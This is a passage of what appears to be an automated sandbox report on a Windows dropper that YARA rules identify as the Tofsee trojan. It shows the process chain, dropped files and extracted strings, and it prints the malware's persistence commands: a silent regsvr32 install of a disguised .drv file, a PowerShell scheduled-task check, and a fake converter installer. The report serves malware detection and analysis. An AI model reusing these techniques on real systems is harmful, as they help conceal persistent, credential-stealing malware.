                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_02D9BF155_2_02D9BF15
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_02DA0DB45_2_02DA0DB4
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00565DEE10_2_00565DEE
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00564BE110_2_00564BE1
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0277C91310_2_0277C913
                    Source: Joe Sandbox ViewDropped File: C:\ProgramData\NTFS2FAT32Converter\sqlite3.dll 16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: String function: 00405964 appears 116 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: String function: 00408C14 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: String function: 00406ACC appears 41 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: String function: 00403400 appears 61 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: String function: 00445DE4 appears 45 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: String function: 004078FC appears 43 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: String function: 004344EC appears 32 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: String function: 00403494 appears 82 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: String function: 00457D58 appears 73 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: String function: 00453330 appears 93 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: String function: 00457B4C appears 98 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: String function: 00403684 appears 221 times
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: String function: 004460B4 appears 59 times
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeCode function: String function: 10003170 appears 34 times
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: String function: 02D97760 appears 32 times
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: String function: 02DA2A10 appears 135 times
                    Source: DrjfIAN86u.exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: Qv4wdsLMG.exe.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: UNIQTWO[1].file.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: UNIQTHREE[1].file.1.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                    Source: DrjfIAN86u.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: DrjfIAN86u.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                    Source: DrjfIAN86u.tmp.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: DrjfIAN86u.tmp.3.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: is-AJ5Q5.tmp.4.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-AJ5Q5.tmp.4.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                    Source: is-AJ5Q5.tmp.4.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-AJ5Q5.tmp.4.drStatic PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped
                    Source: Qv4wdsLMG.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: Qv4wdsLMG.tmp.6.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: Qv4wdsLMG.tmp.8.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: Qv4wdsLMG.tmp.8.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: is-LIN1F.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
                    Source: is-LIN1F.tmp.9.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                    Source: sqlite3.dll.5.drStatic PE information: Number of sections : 19 > 10
                    Source: is-RFHNE.tmp.4.drStatic PE information: Number of sections : 19 > 10
                    Source: is-4R09J.tmp.9.drStatic PE information: Number of sections : 22 > 10
                    Source: nK8noQeiXl.exeBinary or memory string: OriginalFilename vs nK8noQeiXl.exe
                    Source: nK8noQeiXl.exe, 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWINHEX.EXE0 vs nK8noQeiXl.exe
                    Source: nK8noQeiXl.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: 10.2.regsvr32.exe.2859196.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: 10.2.regsvr32.exe.2859196.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
                    Source: 10.2.regsvr32.exe.5512e6.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: 10.2.regsvr32.exe.5512e6.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
                    Source: 10.2.regsvr32.exe.5512e6.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: 10.2.regsvr32.exe.5512e6.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
                    Source: 10.2.regsvr32.exe.2859196.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: 10.2.regsvr32.exe.2859196.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Tofsee author = ditekSHen, description = Detects Tofsee
                    Source: 0000000A.00000002.2572481446.0000000002771000.00000020.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: 0000000A.00000002.2572238453.0000000000550000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: 0000000A.00000002.2572109142.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Tofsee_26124fe4 reference_sample = e658fe6d3bd685f41eb0527432099ee01075bfdb523ef5aa3e5ebd42221c8494, os = windows, severity = x86, creation_date = 2022-03-31, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Tofsee, fingerprint = dc7ada5c6341e98bc41182a5698527b1649c4e80924ba0405f1b94356f63ff31, id = 26124fe4-f2a1-4fc9-8155-585b581476de, last_modified = 2022-04-12
                    Source: ntfs2fat32converter102.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: _RegDLL.tmp.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: NTFS2FAT32Converter.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@32/70@6/8
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_02D8F8D0 _memset,FormatMessageA,GetLastError,FormatMessageA,GetLastError,5_2_02D8F8D0
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_00409448 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,3_2_00409448
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_004555D0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,4_2_004555D0
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpCode function: 4_2_00455DF8 GetModuleHandleA,GetProcAddress,GetDiskFreeSpaceA,4_2_00455DF8
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: CreateServiceA,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,5_2_004016F7
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeCode function: 1_2_10001183 __EH_prolog3_GS,InternetSetFilePointer,InternetReadFile,HttpQueryInfoA,CoCreateInstance,1_2_10001183
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeCode function: 3_2_00409BEC FindResourceA,SizeofResource,LoadResource,LockResource,3_2_00409BEC
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_00401933 StartServiceCtrlDispatcherA,5_2_00401933
                    Source: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exeCode function: 5_2_00401933 StartServiceCtrlDispatcherA,5_2_00401933
                    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_02779A6B SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlen,ExitProcess,GetTempPathA,lstrcpy,lstrcat,lstrcat,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpy,lstrlen,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcat,lstrcat,lstrcat,lstrcat,wsprintfA,lstrcat,lstrcat,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlen,StartServiceCtrlDispatcherA,GetLastError,Sleep,CreateThread,WSAStartup,CreateThread,Sleep,10_2_02779A6B
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\success[1].htmJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1784:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8344:120:WilError_03
                    Source: C:\Windows\SysWOW64\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\HomelyCoat
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9080:120:WilError_03
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeFile created: C:\Users\user\AppData\Local\Temp\svchost015.exeJump to behavior
                    Source: Yara matchFile source: 1.0.svchost015.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000000.1360397961.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY
                    Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\svchost015.exe, type: DROPPED
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : Select Name from Win32_Processor
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpFile read: C:\Windows\win.iniJump to behavior
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
                    Source: ntfs2fat32converter102.exe, ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                    Source: ntfs2fat32converter102.exe, ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                    Source: ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1988881080.00000000039E5000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1989153702.000000000391A000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2008095748.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2006615082.000000000397B000.00000004.00000800.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.1991453997.0000000003919000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: ntfs2fat32converter102.exe, ntfs2fat32converter102.exe, 00000005.00000003.1572435918.00000000009AB000.00000004.00000020.00020000.00000000.sdmp, ntfs2fat32converter102.exe, 00000005.00000002.2576202383.000000006096F000.00000002.00000001.01000000.0000000C.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                    Source: nK8noQeiXl.exeVirustotal: Detection: 38%
                    Source: nK8noQeiXl.exeReversingLabs: Detection: 55%
                    Source: nK8noQeiXl.exeString found in binary or memory: If you think that might be the case, please hold the Shift key when interpreting/adding the image again.
                    Source: nK8noQeiXl.exeString found in binary or memory: remember that you can easily specify the sector size to assume for an image (hold the Shift key while interpreting/adding it).
                    Source: nK8noQeiXl.exeString found in binary or memory: You can try holding the Shift key when interpreting the image/adding it to the case.
                    Source: nK8noQeiXl.exeString found in binary or memory: 80ADC/ADD/AND/CMP/OR/SBB/SUB/XOR
                    Source: nK8noQeiXl.exeString found in binary or memory: 81ADC/ADD/AND/CMP/OR/SBB/SUB/XOR
                    Source: nK8noQeiXl.exeString found in binary or memory: 83ADC/ADD/AND/CMP/OR/SBB/SUB/XOR
                    Source: nK8noQeiXl.exeString found in binary or memory: Cannot load driver. Please re-install it by executing Dokan.exe.
                    Source: unknownProcess created: C:\Users\user\Desktop\nK8noQeiXl.exe "C:\Users\user\Desktop\nK8noQeiXl.exe"
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost015.exe "C:\Users\user\Desktop\nK8noQeiXl.exe"
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeProcess created: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe "C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe"
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp "C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp" /SL5="$60254,3470653,54272,C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmpProcess created: C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe "C:\Users\user\AppData\Local\NTFS to FAT32 Converter 1.0.2\ntfs2fat32converter102.exe" -i
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeProcess created: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe "C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe"
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeProcess created: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp "C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmp" /SL5="$50036,2140910,174080,C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe"
                    Source: C:\Users\user\AppData\Local\Temp\is-T1IUL.tmp\Qv4wdsLMG.tmpProcess created: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe "C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" /VERYSILENT
                    Source: C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exeProcess created: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp "C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmp" /SL5="$20528,2140910,174080,C:\Users\user\AppData\Roaming\LuNQpSc12\Qv4wdsLMG.exe" /VERYSILENT
                    Source: C:\Users\user\AppData\Local\Temp\is-BQE1B.tmp\Qv4wdsLMG.tmpProcess created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:INSTALL "C:\Users\user\AppData\Roaming\\user32_8.drv"
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeProcess created: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe "C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe"
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "PowerShell.exe" -NoProfile -NonInteractive -Command -
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /s /i:INSTALL "C:\Windows\system32\config\systemprofile\AppData\Roaming\user32_8.drv"
                    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\user32_8.drv\"' }) { exit 0 } else { exit 1 }"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\nK8noQeiXl.exeProcess created: C:\Users\user\AppData\Local\Temp\svchost015.exe "C:\Users\user\Desktop\nK8noQeiXl.exe"Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exeProcess created: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe "C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe"Jump to behavior
